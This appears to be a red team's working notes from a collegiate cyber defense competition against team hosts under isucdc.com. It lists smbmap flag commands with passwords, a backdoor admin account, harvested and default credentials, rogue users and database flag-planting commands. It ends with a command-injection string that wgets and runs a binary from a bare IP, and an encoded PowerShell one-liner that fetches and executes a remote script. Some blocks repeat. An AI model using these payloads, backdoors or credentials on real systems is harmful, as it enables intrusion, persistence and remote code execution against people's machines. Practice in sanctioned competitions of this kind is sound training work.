Uploaded Files:
Screenshot_2026-04-25_15-52-23.png,
Screenshot_2026-04-25_15-52-39.png,
Screenshot_2026-04-25_15-53-41.png,
Screenshot_2026-04-25_15-55-28.png
Red debrief slideshow
https://docs.google.com/presentation/d/1s5scDaZxV_1pKk6b9dDdeYqAkRbpumr9pGHwQM0APNI/edit?usp=sharing
SMB flag commands:
https://docs.google.com/presentation/d/1s5scDaZxV_1pKk6b9dDdeYqAkRbpumr9pGHwQM0APNI/edit?usp=sharing
SMB flag commands:
DOWNLOAD: smbmap -H
ad.team40.isucdc.com -u 'david.ward' -p 'vin938fec' --download
"C$/Windows/System32/team11_ad-cwindowssystem32.flag"
UPLOAD: mbmap -H ad.team40.isucdc.com -u 'david.ward' -p 'keq414buz' --upload Downloads/2025-c3/team4/team4_ad-cusersadministrator.flag 'C$/Users/Administrator/team4_ad-cusersadministrator.flag'
UPLOAD: mbmap -H ad.team40.isucdc.com -u 'david.ward' -p 'keq414buz' --upload Downloads/2025-c3/team4/team4_ad-cusersadministrator.flag 'C$/Users/Administrator/team4_ad-cusersadministrator.flag'
Backdoor local admin user on LP for team 1, 4, 6, 10, 11, 13
Username: adminsitrator
Password: Redteamuser123
NOTE: Team 1 and Team 4 appear to have removed access for the backdoor user, however, NULL auth to the Labels SMB share is still allowed
ALSO NOTE: Team 6 and 10 are not real
SHARED CREDS
sandra.henderson->ROCK123
darren.williams->blues22
allison.hamilton->tiny85
lori.petersen->ricale
sandra.henderson->ROCK123
darren.williams->blues22
allison.hamilton->tiny85
lori.petersen->ricale
john.leguizamo:lordoftheflame, cdc:cdc, root:cdc
OK team=1 host=www.team1.isucdc.com user=john.leguizamo reason=ok
OK team=4 host=wms.team4.isucdc.com user=cdc reason=ok
OK team=4 host=www.team4.isucdc.com user=root reason=ok
OK team=7 host=wms.team7.isucdc.com user=cdc reason=ok
OK team=7 host=www.team7.isucdc.com user=cdc reason=ok
OK team=11 host=wms.team11.isucdc.com user=root reason=ok
OK team=13 host=wms.team13.isucdc.com user=cdc reason=ok
OK team=13 host=www.team13.isucdc.com user=cdc reason=ok
OK team=13 host=db.team13.isucdc.com user=cdc reason=ok
OK team=4 host=wms.team4.isucdc.com user=cdc reason=ok
OK team=4 host=www.team4.isucdc.com user=root reason=ok
OK team=7 host=wms.team7.isucdc.com user=cdc reason=ok
OK team=7 host=www.team7.isucdc.com user=cdc reason=ok
OK team=11 host=wms.team11.isucdc.com user=root reason=ok
OK team=13 host=wms.team13.isucdc.com user=cdc reason=ok
OK team=13 host=www.team13.isucdc.com user=cdc reason=ok
OK team=13 host=db.team13.isucdc.com user=cdc reason=ok
Default creds found for:
- Team1
- lp.team1.isucdc.com, RDP && SMB, Administrator:cdc
- Team4
- wms.team4.isucdc.com, SSH, cdc:cdc
- db.team4.isucdc.com, SSH, richard:cdc
- Team7
- www[.]team7.isucdc.com, SSH, cdc:cdc
- wms.team7.isucdc.com, SSH, cdc:cdc
- Team12
- db.team12.isucdc.com, SSH, richard:cdc
- Team13
- ad.team13.isucdc.com, LDAP, Administrator:cdc
- www[.]team13.isucdc.com, SSH, cdc:cdc
- lp.team13.isucdc.com, RDP && SMB, Administrator:cdc
- wms.team13.isucdc.com, SSH, cdc:cdc
New user on teams 4,7,13 for www, wms, and db - `killer-bob:whokilledlaurapalmer` or `killer.bob:WhoKilledLauraPalmer`, or `killerbob:whokilledlaurapalmer`.
mysql -u cdc -p'cdc' -h db.team9.isucdc.com
use iseage_db;
create table if not exists red ( id int AUTO_INCREMENT PRIMARY KEY, flag VARCHAR(50) NOT NULL);
insert into red (flag) values ('Lx56MVFytdT9dhiLpmc3T457vBwbMtDV2FTEUzxEQtSrGQDSWp');
select * from red;
use iseage_db;
create table if not exists red ( id int AUTO_INCREMENT PRIMARY KEY, flag VARCHAR(50) NOT NULL);
insert into red (flag) values ('Lx56MVFytdT9dhiLpmc3T457vBwbMtDV2FTEUzxEQtSrGQDSWp');
select * from red;
asdf\"; wget http://12.110.206.199:443/t -O /tmp/a; chmod +x /tmp/a; /tmp/a; \"asdf
powershell -e aQByAG0AKAAnAGgAdAB0AHAAOgAvAC8AMQAyAC4AMQAxADAALgAyADIANgAuADEANgA2AC8AcgAuAHAAcwAxACcAKQB8AGkAZQB4AA==